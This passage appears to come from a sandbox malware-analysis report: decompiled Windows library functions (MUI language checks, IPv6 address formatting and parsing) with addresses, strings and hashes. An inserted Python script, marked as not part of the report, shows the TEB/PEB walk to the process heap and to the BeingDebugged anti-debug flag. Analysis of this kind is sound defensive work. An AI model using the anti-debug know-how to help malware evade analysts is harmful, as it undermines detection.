                                          					}
                                          					_t257 = _v24;
                                          					_t322 = _t257 + 4;
                                          					_push(_t257);
                                          					_v40 = _t322;
                                          					E009C718A(_t257);
                                          					_t338 = _t335 + 4;
                                          					if(_t322 == _t318) {
                                          						_v20 = _t318;
                                          					} else {
                                          						_v20 = E009AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          					}
                                          					if(_v20 == _t318) {
                                          						_v40 = _t318;
                                          						goto L58;
                                          					} else {
                                          						E009A2340(_v20, _v8, _v24);
                                          						_v16 = _v20;
                                          						_a4 = _t318;
                                          						_t261 = E009BE679(_v20, _t332);
                                          						_t335 = _t338 + 0x14;
                                          						while(1) {
                                          							_v12 = _t261;
                                          							if(_t261 == _t318) {
                                          								break;
                                          							}
                                          							_v12 = _v12 + 2;
                                          							 *_v12 = 0;
                                          							E009AE2A8(_v12,  &_v68, _v16);
                                          							if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          							_v16 = _v12;
                                          							_t261 = E009BE679(_v12, _t332);
                                          							_pop(_t322);
                                          						}
                                          						_t269 = _v16;
                                          						if( *_v16 != _t318) {
                                          							E009AE2A8(_t322,  &_v68, _t269);
                                          							if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
                                          								_a4 = _a4 + 1;
                                          							}
                                          						}
                                          						if(_a4 == _t318) {
                                          							E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                          							_v40 = _t318;
                                          							_v20 = _t318;
                                          						}
                                          						if(_v8 != _t318) {
                                          							E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          						}
                                          						_v8 = _t318;
                                          						goto L30;
                                          					}
                                          				}
                                          				_t284 = _v24;
                                          				_t322 = _t284 + 4;
                                          				_push(_t284);
                                          				_v48 = _t322;
                                          				E009C718A(_t284);
                                          				_t339 = _t335 + 4;
                                          				if(_t322 == _t318) {
                                          					_v28 = _t318;
                                          				} else {
                                          					_v28 = E009AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                          				}
                                          				if(_v28 == _t318) {
                                          					_v48 = _t318;
                                          					goto L58;
                                          				} else {
                                          					E009A2340(_v28, _v8, _v24);
                                          					_v16 = _v28;
                                          					_a4 = _t318;
                                          					_t288 = E009BE679(_v28, _t332);
                                          					_t335 = _t339 + 0x14;
                                          					while(1) {
                                          						_v12 = _t288;
                                          						if(_t288 == _t318) {
                                          							break;
                                          						}
                                          						_v12 = _v12 + 2;
                                          						 *_v12 = 0;
                                          						E009AE2A8(_v12,  &_v68, _v16);
                                          						if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          						_v16 = _v12;
                                          						_t288 = E009BE679(_v12, _t332);
                                          						_pop(_t322);
                                          					}
                                          					_t296 = _v16;
                                          					if( *_v16 != _t318) {
                                          						E009AE2A8(_t322,  &_v68, _t296);
                                          						if(E009C5553(_t328,  &_v68,  &_v36) != 0) {
                                          							_a4 = _a4 + 1;
                                          						}
                                          					}
                                          					if(_a4 == _t318) {
                                          						E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                          						_v48 = _t318;
                                          						_v28 = _t318;
                                          					}
                                          					if(_v8 != _t318) {
                                          						E009AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                          					}
                                          					_v8 = _t318;
                                          					goto L17;
                                          				}
                                          			}
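
The decompiled function above repeats the expression `*((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18))` every time it allocates or frees. The script below is an added example, not part of the report, that shows what that chain resolves to in a 32-bit process: `fs:[0x18]` is `TEB.NtTib.Self`, `TEB+0x30` is `ProcessEnvironmentBlock`, and `PEB+0x18` is `ProcessHeap`, so the value handed to `E009AE025` and `E009AE0C6` is the default process heap handle. It also reads the neighbouring `PEB.BeingDebugged` byte, because the same walk is how user-mode anti-debug checks find it. The structure layouts are the documented Windows x86 ones; the memory image, addresses and heap handle are constructed for the demonstration.

```python
"""Added example (not from the report): resolve the decompiled chain
    *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18))
against a constructed 32-bit TEB/PEB image. Layout offsets are the documented
Windows x86 ones; every address and value in the image below is invented.
"""
import ctypes
import struct


class NT_TIB32(ctypes.Structure):
    _fields_ = [
        ("ExceptionList", ctypes.c_uint32),          # +0x00
        ("StackBase", ctypes.c_uint32),              # +0x04
        ("StackLimit", ctypes.c_uint32),             # +0x08
        ("SubSystemTib", ctypes.c_uint32),           # +0x0C
        ("FiberData", ctypes.c_uint32),              # +0x10
        ("ArbitraryUserPointer", ctypes.c_uint32),   # +0x14
        ("Self", ctypes.c_uint32),                   # +0x18  <- fs:[0x18]
    ]


class TEB32_HEAD(ctypes.Structure):
    """Leading part of the 32-bit TEB, enough to reach ProcessEnvironmentBlock."""
    _fields_ = [
        ("NtTib", NT_TIB32),                             # +0x00 .. +0x1B
        ("EnvironmentPointer", ctypes.c_uint32),         # +0x1C
        ("ClientId_UniqueProcess", ctypes.c_uint32),     # +0x20
        ("ClientId_UniqueThread", ctypes.c_uint32),      # +0x24
        ("ActiveRpcHandle", ctypes.c_uint32),            # +0x28
        ("ThreadLocalStoragePointer", ctypes.c_uint32),  # +0x2C
        ("ProcessEnvironmentBlock", ctypes.c_uint32),    # +0x30  <- TEB+0x30
    ]


class PEB32_HEAD(ctypes.Structure):
    """Leading part of the 32-bit PEB, enough to reach ProcessHeap."""
    _fields_ = [
        ("InheritedAddressSpace", ctypes.c_uint8),     # +0x00
        ("ReadImageFileExecOptions", ctypes.c_uint8),  # +0x01
        ("BeingDebugged", ctypes.c_uint8),             # +0x02  (IsDebuggerPresent reads this)
        ("BitField", ctypes.c_uint8),                  # +0x03
        ("Mutant", ctypes.c_uint32),                   # +0x04
        ("ImageBaseAddress", ctypes.c_uint32),         # +0x08
        ("Ldr", ctypes.c_uint32),                      # +0x0C
        ("ProcessParameters", ctypes.c_uint32),        # +0x10
        ("SubSystemData", ctypes.c_uint32),            # +0x14
        ("ProcessHeap", ctypes.c_uint32),              # +0x18  <- PEB+0x18
    ]


TEB_SELF_OFF = NT_TIB32.Self.offset                     # 0x18
TEB_PEB_OFF = TEB32_HEAD.ProcessEnvironmentBlock.offset  # 0x30
PEB_HEAP_OFF = PEB32_HEAD.ProcessHeap.offset             # 0x18
PEB_DEBUGGED_OFF = PEB32_HEAD.BeingDebugged.offset       # 0x02


def build_memory(teb_addr: int, peb_addr: int, heap: int, debugged: bool = False) -> dict:
    """Constructed flat memory: {base: bytes} with a TEB and a PEB at invented addresses."""
    teb = TEB32_HEAD()
    teb.NtTib.Self = teb_addr          # fs base points at the TEB, and TEB.Self points back at it
    teb.ProcessEnvironmentBlock = peb_addr
    peb = PEB32_HEAD()
    peb.ProcessHeap = heap
    peb.BeingDebugged = 1 if debugged else 0
    return {teb_addr: bytes(teb), peb_addr: bytes(peb)}


def read32(mem: dict, addr: int) -> int:
    for base, blob in mem.items():
        if base <= addr and addr + 4 <= base + len(blob):
            return struct.unpack_from("<I", blob, addr - base)[0]
    raise ValueError(f"unmapped read at {addr:#010x}")


def process_heap_via_fs(mem: dict, fs_base: int) -> int:
    """Mirror the decompiled chain: *[fs:0x18] -> +0x30 -> +0x18."""
    teb = read32(mem, fs_base + TEB_SELF_OFF)   # fs:[0x18] == TEB.Self == fs base
    peb = read32(mem, teb + TEB_PEB_OFF)        # TEB.ProcessEnvironmentBlock
    return read32(mem, peb + PEB_HEAP_OFF)      # PEB.ProcessHeap


def being_debugged(mem: dict, fs_base: int) -> bool:
    """Same walk, one field earlier in the PEB: the byte IsDebuggerPresent returns."""
    teb = read32(mem, fs_base + TEB_SELF_OFF)
    peb = read32(mem, teb + TEB_PEB_OFF)
    base = next(b for b in mem if b <= peb < b + len(mem[b]))
    return mem[base][peb - base + PEB_DEBUGGED_OFF] != 0


if __name__ == "__main__":
    mem = build_memory(teb_addr=0x7FFDE000, peb_addr=0x7FFDF000, heap=0x00570000)
    print(f"ProcessHeap = {process_heap_via_fs(mem, 0x7FFDE000):#010x}")
```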
                                          Instruction addresses for the C-Code listing above, one per statement in listing order (the column continues below):
                                          0x009c8788 0x009c8788 0x009c8791 0x009c8794 0x009c8798 0x009c879b 0x009c879e 0x009c87a1
                                          0x009c87a4 0x009c87a7 0x009c87aa 0x009c87af 0x00a11ad3 0x009c8b0a 0x009c8b0d 0x009c8b13
                                          0x009c8b19 0x009c8b1f 0x009c8b25 0x009c8b2b 0x009c8b31 0x009c8b37 0x009c8b3d 0x009c8b46
                                          0x009c8b46 0x009c87c6 0x009c87d0 0x00a11ae0 0x00a11ae6 0x00a11af8 0x00a11af8 0x00a11afd
                                          0x00a11afe 0x00a11b01 0x00a11b06 0x00a11b06 0x009c87d6 0x009c87f2 0x009c87f7 0x009c8807
                                          0x009c880a 0x009c880f 0x009c8810 0x009c8813 0x009c8818 0x009c8818 0x009c882c 0x009c8831
                                          0x009c8838 0x009c8908 0x009c8920 0x009c89f0 0x009c8a08 0x009c8af6 0x009c8af6 0x009c8af8
                                          0x009c8afb 0x00a11beb 0x00a11beb 0x009c8b04 0x00a11bf8 0x00a11c0e 0x00a11c13 0x00a11c16
                                          0x00a11c16 0x00a11bf8 0x00000000 0x009c8b04 0x009c8a0e 0x009c8a11 0x009c8a14 0x009c8a15
                                          0x009c8a18 0x009c8a22 0x009c8b59 0x009c8a28 0x009c8a3c 0x009c8a3c 0x009c8a42 0x00a11bb0
                                          0x00a11b11 0x00a11b11
                                          0x00000000
                                          0x009c8a48
                                          0x009c8a51
                                          0x009c8a5b
                                          0x009c8a5e
                                          0x009c8a61
                                          0x009c8a69
                                          0x009c8a69
                                          0x009c8a6d
                                          0x00000000
                                          0x00000000
                                          0x009c8a74
                                          0x009c8a7c
                                          0x009c8a7d
                                          0x009c8a91
                                          0x009c8a93
                                          0x009c8a93
                                          0x009c8a98
                                          0x009c8a9b
                                          0x009c8aa1
                                          0x009c8aa1
                                          0x009c8aa4
                                          0x009c8aaa
                                          0x009c8ab1
                                          0x009c8ac5
                                          0x009c8ac7
                                          0x009c8ac7
                                          0x009c8ac5
                                          0x009c8ace
                                          0x00a11bc9
                                          0x00a11bce
                                          0x00a11bd2
                                          0x00a11bd2
                                          0x009c8ad8
                                          0x009c8aeb
                                          0x009c8aeb
                                          0x009c8af0
                                          0x009c8af4
                                          0x00000000
                                          0x009c8af4
                                          0x009c8a42
                                          0x009c8926
                                          0x009c8929
                                          0x009c892c
                                          0x009c892d
                                          0x009c8930
                                          0x009c8935
                                          0x009c893a
                                          0x009c8b51
                                          0x009c8940
                                          0x009c8954
                                          0x009c8954
                                          0x009c895a
                                          0x00a11b63
                                          0x00000000
                                          0x009c8960
                                          0x009c8969
                                          0x009c8973
                                          0x009c8976
                                          0x009c8979
                                          0x009c897e
                                          0x009c8981
                                          0x009c8981
                                          0x009c8986
                                          0x00000000
                                          0x00000000
                                          0x00a11b6e
                                          0x00a11b74
                                          0x00a11b7b
                                          0x00a11b8f
                                          0x00a11b91
                                          0x00a11b91
                                          0x00a11b99
                                          0x00a11b9c
                                          0x00a11ba2
                                          0x00a11ba2
                                          0x009c898c
                                          0x009c8992
                                          0x009c8999
                                          0x009c89ad
                                          0x00a11ba8
                                          0x00a11ba8
                                          0x009c89ad
                                          0x009c89b6
                                          0x009c89c8
                                          0x009c89cd
                                          0x009c89d0
                                          0x009c89d0
                                          0x009c89d6
                                          0x009c89e8
                                          0x009c89e8
                                          0x009c89ed
                                          0x00000000
                                          0x009c89ed
                                          0x009c895a
                                          0x009c883e
                                          0x009c8841
                                          0x009c8844
                                          0x009c8845
                                          0x009c8848
                                          0x009c884d
                                          0x009c8852
                                          0x009c8b49
                                          0x009c8858
                                          0x009c886c
                                          0x009c886c
                                          0x009c8872
                                          0x00a11b0e
                                          0x00000000
                                          0x009c8878
                                          0x009c8881
                                          0x009c888b
                                          0x009c888e
                                          0x009c8891
                                          0x009c8896
                                          0x009c8899
                                          0x009c8899
                                          0x009c889e
                                          0x00000000
                                          0x00000000
                                          0x00a11b21
                                          0x00a11b27
                                          0x00a11b2e
                                          0x00a11b42
                                          0x00a11b44
                                          0x00a11b44
                                          0x00a11b4c
                                          0x00a11b4f
                                          0x00a11b55
                                          0x00a11b55
                                          0x009c88a4
                                          0x009c88aa
                                          0x009c88b1
                                          0x009c88c5
                                          0x00a11b5b
                                          0x00a11b5b
                                          0x009c88c5
                                          0x009c88ce
                                          0x009c88e0
                                          0x009c88e5
                                          0x009c88e8
                                          0x009c88e8
                                          0x009c88ee
                                          0x009c8900
                                          0x009c8900
                                          0x009c8905
                                          0x00000000
                                          0x009c8905

                                          APIs
                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 009C89FC
                                          • WindowsExcludedProcs, xrefs: 009C87C1
                                          • Kernel-MUI-Language-Disallowed, xrefs: 009C8914
                                          • Kernel-MUI-Number-Allowed, xrefs: 009C87E6
                                          • Kernel-MUI-Language-Allowed, xrefs: 009C8827
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: _wcspbrk
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 402402107-258546922
                                          • Opcode ID: 706fd3ad53eb3a4508093506800d61a8c1b84a5aa439fb5caeda8e8e76b7f0dc
                                          • Instruction ID: 65436cbde044b0565dac12a08dacd56a8b444a715543db40564c185c3775db4e
                                          • Opcode Fuzzy Hash: 706fd3ad53eb3a4508093506800d61a8c1b84a5aa439fb5caeda8e8e76b7f0dc
                                          • Instruction Fuzzy Hash: 63F1F7B2D04209EFCF51EF95C981EEEB7B8FF48300F15446AE605A7211EB349A45DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E009E13CB(intOrPtr* _a4, intOrPtr _a8) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				intOrPtr _t71;
                                          				signed int _t78;
                                          				signed int _t86;
                                          				char _t90;
                                          				signed int _t91;
                                          				signed int _t96;
                                          				intOrPtr _t108;
                                          				signed int _t114;
                                          				void* _t115;
                                          				intOrPtr _t128;
                                          				intOrPtr* _t129;
                                          				void* _t130;
                                          				intOrPtr _t116;   /* zero register; decompiler output omitted its declaration */
                                          				char* _t26;       /* points at _v24 in the loop below; declaration was missing */
                                          
                                          				_t129 = _a4;
                                          				_t128 = _a8;
                                          				_t116 = 0;
                                          				_t71 = _t128 + 0x5c;
                                          				_v8 = 8;
                                          				_v20 = _t71;
                                          				if( *_t129 == 0) {
                                          					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                          						goto L5;
                                          					} else {
                                          						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                          						if(_t96 != 0) {
                                          							L38:
                                          							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                          								goto L5;
                                          							} else {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t86 = E009D7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                          								L36:
                                          								return _t128 + _t86 * 2;
                                          							}
                                          						}
                                          						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                          						if(_t114 == 0) {
                                          							L33:
                                          							_t115 = 0x9a2926;
                                          							L35:
                                          							_push( *(_t129 + 0xf) & 0x000000ff);
                                          							_push( *(_t129 + 0xe) & 0x000000ff);
                                          							_push( *(_t129 + 0xd) & 0x000000ff);
                                          							_push( *(_t129 + 0xc) & 0x000000ff);
                                          							_t86 = E009D7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                          							goto L36;
                                          						}
                                          						if(_t114 != 0xffff) {
                                          							_t116 = 0;
                                          							goto L38;
                                          						}
                                          						if(_t114 != 0) {
                                          							_t115 = 0x9a9cac;
                                          							goto L35;
                                          						}
                                          						goto L33;
                                          					}
                                          				} else {
                                          					L5:
                                          					_a8 = _t116;
                                          					_a4 = _t116;
                                          					_v12 = _t116;
                                          					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                          						if( *(_t129 + 0xa) == 0xfe5e) {
                                          							_v8 = 6;
                                          						}
                                          					}
                                          					_t90 = _v8;
                                          					if(_t90 <= _t116) {
                                          						L11:
                                          						if(_a8 - _a4 <= 1) {
                                          							_a8 = _t116;
                                          							_a4 = _t116;
                                          						}
                                          						_t91 = 0;
                                          						if(_v8 <= _t116) {
                                          							L22:
                                          							if(_v8 < 8) {
                                          								_push( *(_t129 + 0xf) & 0x000000ff);
                                          								_push( *(_t129 + 0xe) & 0x000000ff);
                                          								_push( *(_t129 + 0xd) & 0x000000ff);
                                          								_t128 = _t128 + E009D7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                          							}
                                          							return _t128;
                                          						} else {
                                          							L14:
                                          							if(_a4 > _t91 || _t91 >= _a8) {
                                          								if(_t91 != _t116 && _t91 != _a8) {
                                          									_push(":");
                                          									_push(_t71 - _t128 >> 1);
                                          									_push(_t128);
                                          									_t128 = _t128 + E009D7707() * 2;
                                          									_t71 = _v20;
                                          									_t130 = _t130 + 0xc;
                                          								}
                                          								_t78 = E009D7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                          								_t130 = _t130 + 0x10;
                                          							} else {
                                          								_push(L"::");
                                          								_push(_t71 - _t128 >> 1);
                                          								_push(_t128);
                                          								_t78 = E009D7707();
                                          								_t130 = _t130 + 0xc;
                                          								_t91 = _a8 - 1;
                                          							}
                                          							_t91 = _t91 + 1;
                                          							_t128 = _t128 + _t78 * 2;
                                          							_t71 = _v20;
                                          							if(_t91 >= _v8) {
                                          								goto L22;
                                          							}
                                          							_t116 = 0;
                                          							goto L14;
                                          						}
                                          					} else {
                                          						_t108 = 1;
                                          						_v16 = _t129;
                                          						_v24 = _t90;
                                          						do {
                                          							if( *_v16 == _t116) {
                                          								if(_t108 - _v12 > _a8 - _a4) {
                                          									_a4 = _v12;
                                          									_a8 = _t108;
                                          								}
                                          								_t116 = 0;
                                          							} else {
                                          								_v12 = _t108;
                                          							}
                                          							_v16 = _v16 + 2;
                                          							_t108 = _t108 + 1;
                                          							_t26 =  &_v24;
                                          							 *_t26 = _v24 - 1;
                                          						} while ( *_t26 != 0);
                                          						goto L11;
                                          					}
                                          				}
                                          			}
                                          0x009e13d5
                                          0x009e13d9
                                          0x009e13dc
                                          0x009e13de
                                          0x009e13e1
                                          0x009e13e8
                                          0x009e13ee
                                          0x00a0e8fd
                                          0x00000000
                                          0x00a0e921
                                          0x00a0e921
                                          0x00a0e928
                                          0x00a0e982
                                          0x00a0e98a
                                          0x00000000
                                          0x00a0e99a
                                          0x00a0e99e
                                          0x00a0e9a3
                                          0x00a0e9a8
                                          0x00a0e9b9
                                          0x00a0e978
                                          0x00000000
                                          0x00a0e978
                                          0x00a0e98a
                                          0x00a0e92a
                                          0x00a0e931
                                          0x00a0e944
                                          0x00a0e944
                                          0x00a0e950
                                          0x00a0e954
                                          0x00a0e959
                                          0x00a0e95e
                                          0x00a0e963
                                          0x00a0e970
                                          0x00000000
                                          0x00a0e975
                                          0x00a0e93b
                                          0x00a0e980
                                          0x00000000
                                          0x00a0e980
                                          0x00a0e942
                                          0x00a0e94b
                                          0x00000000
                                          0x00a0e94b
                                          0x00000000
                                          0x00a0e942
                                          0x009e13f4
                                          0x009e13f4
                                          0x009e13f9
                                          0x009e13fc
                                          0x009e13ff
                                          0x009e1406
                                          0x00a0e9cc
                                          0x00a0e9d2
                                          0x00a0e9d2
                                          0x00a0e9cc
                                          0x009e140c
                                          0x009e1411
                                          0x009e1431
                                          0x009e143a
                                          0x009e143c
                                          0x009e143f
                                          0x009e143f
                                          0x009e1442
                                          0x009e1447
                                          0x009e14a8
                                          0x009e14ac
                                          0x00a0e9e2
                                          0x00a0e9e7
                                          0x00a0e9ec
                                          0x00a0ea05
                                          0x00a0ea05
                                          0x00000000
                                          0x009e1449
                                          0x00000000
                                          0x009e1449
                                          0x009e144c
                                          0x009e1459
                                          0x009e1462
                                          0x009e1469
                                          0x009e146a
                                          0x009e1470
                                          0x009e1473
                                          0x009e1476
                                          0x009e1476
                                          0x009e1490
                                          0x009e1495
                                          0x009e138e
                                          0x009e1390
                                          0x009e1397
                                          0x009e1398
                                          0x009e1399
                                          0x009e13a1
                                          0x009e13a4
                                          0x009e13a4
                                          0x009e1498
                                          0x009e149c
                                          0x009e149f
                                          0x009e14a2
                                          0x00000000
                                          0x00000000
                                          0x009e14a4
                                          0x00000000
                                          0x009e14a4
                                          0x009e1413
                                          0x009e1415
                                          0x009e1416
                                          0x009e1419
                                          0x009e141c
                                          0x009e1422
                                          0x009e13b7
                                          0x009e13bc
                                          0x009e13bf
                                          0x009e13bf
                                          0x009e13c2
                                          0x009e1424
                                          0x009e1424
                                          0x009e1424
                                          0x009e1427
                                          0x009e142b
                                          0x009e142c
                                          0x009e142c
                                          0x009e142c
                                          0x00000000
                                          0x009e141c
                                          0x009e1411

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: ___swprintf_l
                                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                          • API String ID: 48624451-2108815105
                                          • Opcode ID: 0d432d3b7fb4a386975ecf8e7adec361be706cc47ec2a1319347e4242117fb2a
                                          • Instruction ID: bb9c42c630166003fd9e98af13f6af8369a6fa2802d3cce3f7a170ab226f72ff
                                          • Opcode Fuzzy Hash: 0d432d3b7fb4a386975ecf8e7adec361be706cc47ec2a1319347e4242117fb2a
                                          • Instruction Fuzzy Hash: 5361F871904695A6CF35DF9AC8808BEBBB9FFD5300754C52EF4D647681E234AE40DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E009E0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				void* _t108;
                                          				void* _t116;
                                          				char _t120;
                                          				short _t121;
                                          				void* _t128;
                                          				intOrPtr* _t130;
                                          				char _t132;
                                          				short _t133;
                                          				intOrPtr _t141;
                                          				signed int _t156;
                                          				signed int _t174;
                                          				intOrPtr _t177;
                                          				intOrPtr* _t179;
                                          				intOrPtr _t180;
                                          				void* _t183;
                                          
                                          				_t179 = _a4;
                                          				_t141 =  *_t179;
                                          				_v16 = 0;
                                          				_v28 = 0;
                                          				_v8 = 0;
                                          				_v24 = 0;
                                          				_v12 = 0;
                                          				_v32 = 0;
                                          				_v20 = 0;
                                          				if(_t141 == 0) {
                                          					L41:
                                          					 *_a8 = _t179;
                                          					_t180 = _v24;
                                          					if(_t180 != 0) {
                                          						if(_t180 != 3) {
                                          							goto L6;
                                          						}
                                          						_v8 = _v8 + 1;
                                          					}
                                          					_t174 = _v32;
                                          					if(_t174 == 0) {
                                          						if(_v8 == 7) {
                                          							goto L43;
                                          						}
                                          						goto L6;
                                          					}
                                          					L43:
                                          					if(_v16 != 1) {
                                          						if(_v16 != 2) {
                                          							goto L6;
                                          						}
                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                          						L47:
                                          						if(_t174 != 0) {
                                          							E009B8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                          							_t116 = 8;
                                          							L009ADFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                          						}
                                          						return 0;
                                          					}
                                          					if(_t180 != 0) {
                                          						if(_v12 > 3) {
                                          							goto L6;
                                          						}
                                          						_t120 = L009E0CFA(_v28, 0, 0xa);
                                          						_t183 = _t183 + 0xc;
                                          						if(_t120 > 0xff) {
                                          							goto L6;
                                          						}
                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                          						goto L47;
                                          					}
                                          					if(_v12 > 4) {
                                          						goto L6;
                                          					}
                                          					_t121 = L009E0CFA(_v28, _t180, 0x10);
                                          					_t183 = _t183 + 0xc;
                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                          					goto L47;
                                          				} else {
                                          					while(1) {
                                          						_t123 = _v16;
                                          						if(_t123 == 0) {
                                          							goto L7;
                                          						}
                                          						_t108 = _t123 - 1;
                                          						if(_t108 != 0) {
                                          							goto L1;
                                          						}
                                          						_t178 = _t141;
                                          						if(E009E06BA(_t108, _t141) == 0 || _t135 == 0) {
                                          							if(E009E06BA(_t135, _t178) == 0 || E009E0A5B(_t136, _t178) == 0) {
                                          								if(_t141 != 0x3a) {
                                          									if(_t141 == 0x2e) {
                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                          											goto L41;
                                          										} else {
                                          											_v24 = _v24 + 1;
                                          											L27:
                                          											_v16 = _v16 & 0x00000000;
                                          											L28:
                                          											if(_v28 == 0) {
                                          												goto L20;
                                          											}
                                          											_t177 = _v24;
                                          											if(_t177 != 0) {
                                          												if(_v12 > 3) {
                                          													L6:
                                          													return 0xc000000d;
                                          												}
                                          												_t132 = L009E0CFA(_v28, 0, 0xa);
                                          												_t183 = _t183 + 0xc;
                                          												if(_t132 > 0xff) {
                                          													goto L6;
                                          												}
                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                          												goto L20;
                                          											}
                                          											if(_v12 > 4) {
                                          												goto L6;
                                          											}
                                          											_t133 = L009E0CFA(_v28, 0, 0x10);
                                          											_t183 = _t183 + 0xc;
                                          											_v20 = _v20 + 1;
                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                          											goto L20;
                                          										}
                                          									}
                                          									goto L41;
                                          								}
                                          								if(_v24 > 0 || _v8 > 6) {
                                          									goto L41;
                                          								} else {
                                          									_t130 = _t179 + 1;
                                          									if( *_t130 == _t141) {
                                          										if(_v32 != 0) {
                                          											goto L41;
                                          										}
                                          										_v32 = _v8 + 1;
                                          										_t156 = 2;
                                          										_v8 = _v8 + _t156;
                                          										L34:
                                          										_t179 = _t130;
                                          										_v16 = _t156;
                                          										goto L28;
                                          									}
                                          									_v8 = _v8 + 1;
                                          									goto L27;
                                          								}
                                          							} else {
                                          								_v12 = _v12 + 1;
                                          								if(_v24 > 0) {
                                          									goto L41;
                                          								}
                                          								_a7 = 1;
                                          								goto L20;
                                          							}
                                          						} else {
                                          							_v12 = _v12 + 1;
                                          							L20:
                                          							_t179 = _t179 + 1;
                                          							_t141 =  *_t179;
                                          							if(_t141 == 0) {
                                          								goto L41;
                                          							}
                                          							continue;
                                          						}
                                          						L7:
                                          						if(_t141 == 0x3a) {
                                          							if(_v24 > 0 || _v8 > 0) {
                                          								goto L41;
                                          							} else {
                                          								_t130 = _t179 + 1;
                                          								if( *_t130 != _t141) {
                                          									goto L41;
                                          								}
                                          								_v20 = _v20 + 1;
